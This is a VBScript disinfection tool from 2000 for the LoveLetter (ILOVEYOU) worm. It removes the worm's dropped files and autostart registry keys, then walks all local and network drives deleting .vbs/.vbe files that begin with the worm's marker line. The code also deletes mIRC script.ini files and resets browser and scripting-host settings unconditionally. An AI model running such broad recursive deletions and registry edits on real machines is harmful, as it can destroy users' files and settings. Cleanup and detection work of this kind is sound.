rem (C) 2000 Content Management AG
rem written by Babak Kunze and Raoul Matthiessen

rem read this legal notice:
rem Use this script at your own risk. We don't provide
rem any guarantee for any damage caused by this cleaner.
rem Downloading and installing the software provided
rem here is at your own risk. CM4all assumes no warranty
rem or liability for any damage that may result from
rem installation and execution.
rem Users waive any claims against CM4all that may
rem arise from this process.
rem By downloading the software, users accept these
rem terms of use.
rem Run the program by saving it to your hard disk
rem and then starting it with a double-click.

rem kill barok -loveletter(vbe)

rem Before using this script, delete all mails
rem containing the original worm from your inbox
rem in your mail reader. If the worm gets to execute
rem after applying this patch, it also overwrites this
rem script with its own code. Make this script read-only
rem after download to protect it from being overwritten!

rem This script is a modified version of the
rem original worm and uses the same way
rem of searching for the files it tries to infect.
rem This modified program runs through all reachable
rem directories and looks for files ending with ".vbs".
rem It reads the first line to see if the file is really
rem infected. If so, the file is removed from
rem the disk. A log file is created in the root
rem directory of the first hard disk: "C:\uninfect.log".
rem You can check which files have been removed
rem in order to restore them from an available
rem backup medium. No data can be recovered by the
rem script, but it helps prevent further damage.

On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
rem vbscopy=file.ReadAll
main()

rem delete the worm's dropped copies, clean the registry, then scan all drives
sub main()
  On Error Resume Next
  dim wscr,rr
  set wscr=CreateObject("WScript.Shell")
  Set dirwin = fso.GetSpecialFolder(0)
  Set dirsystem = fso.GetSpecialFolder(1)
  Set dirtemp = fso.GetSpecialFolder(2)
  fso.DeleteFile dirsystem&"\MSKernel32.vbs", true
  fso.DeleteFile dirwin&"\Win32DLL.vbs", true
  fso.DeleteFile dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs", true
  fso.DeleteFile dirsystem&"\LOVE-LETTER-FOR-YOU.HTM", true
  regruns()
  listadriv()
  wscr.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
end sub

rem remove the worm's autostart entries and the downloaded WIN-BUGSFIX.exe,
rem and reset the Internet Explorer start page
sub regruns()
  On Error Resume Next
  Dim num,downread
  regdelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32"
  regdelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL"
  downread=""
  downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
  if (downread="") then
    downread="c:\"
  end if
  rem fileexist returns 0 when the file exists
  if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
    fso.DeleteFile downread&"\WIN-BUGSFIX.exe", true
  end if
  regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "about:blank"
  regdelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX"
end sub

rem walk every fixed disk (type 2) and network drive (type 3)
sub listadriv
  On Error Resume Next
  Dim d,dc
  Set dc = fso.Drives
  For Each d in dc
    If d.DriveType = 2 or d.DriveType=3 Then
      folderlist(d.path&"\")
    end if
  Next
end sub

rem check every script in one folder, delete infected ones and log the result
sub deinfectfiles(folderspec)
  On Error Resume Next
  dim f,f1,fc,ext,ap,mircfname,s,bname,mp3,cmfile,cmline,cmtodel
  set ap = fso.OpenTextFile("c:\uninfect.log", 8, true, -2)
  ap.write "trying desinfect in: "&folderspec&vbcrlf
  set f = fso.GetFolder(folderspec)
  set fc = f.Files
  for each f1 in fc
    ext=fso.GetExtensionName(f1.path)
    ext=lcase(ext)
    s=lcase(f1.name)
    if (ext="vbs") or (ext="vbe") then
      rem reset first: a failed open or short read must not reuse the previous file's result
      cmline = ""
      set cmfile = fso.openTextFile(f1.path, 1, false, -2)
      cmline = cmfile.Read(27)
      cmfile.close()
      rem the worm's first line starts with this 27-character marker (two spaces after "rem")
      if (cmline = "rem  barok -loveletter(vbe)") then
        ap.write "found infected script: "&f1.path&vbcrlf
        set cmtodel = fso.GetFile(f1.path)
        cmtodel.Delete(true)
      else
        ap.write "found clean script: "&f1.path&vbcrlf
      end if
    end if
    rem in an mIRC directory, remove the script.ini the worm overwrites
    if (eq<>folderspec) then
      if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
        set cmtodel = fso.GetFile(folderspec&"\script.ini")
        cmtodel.Delete(true)
      end if
    end if
  next
  ap.close
end sub

rem recurse through all subfolders of folderspec
sub folderlist(folderspec)
  On Error Resume Next
  dim f,f1,sf
  set f = fso.GetFolder(folderspec)
  set sf = f.SubFolders
  for each f1 in sf
    deinfectfiles(f1.path)
    folderlist(f1.path)
  next
end sub

sub regcreate(regkey,regvalue)
  Set regedit = CreateObject("WScript.Shell")
  regedit.RegWrite regkey,regvalue
end sub

sub regdelete(regkey)
  Set regedit = CreateObject("WScript.Shell")
  regedit.RegDelete regkey
end sub

function regget(value)
  Set regedit = CreateObject("WScript.Shell")
  regget=regedit.RegRead(value)
end function

rem returns 0 if the file exists, 1 otherwise
function fileexist(filespec)
  On Error Resume Next
  dim msg
  if (fso.FileExists(filespec)) Then
    msg = 0
  else
    msg = 1
  end if
  fileexist = msg
end function

rem returns 0 if the folder exists, 1 otherwise
function folderexist(folderspec)
  On Error Resume Next
  dim msg
  if (fso.FolderExists(folderspec)) then
    msg = 0
  else
    msg = 1
  end if
  folderexist = msg
end function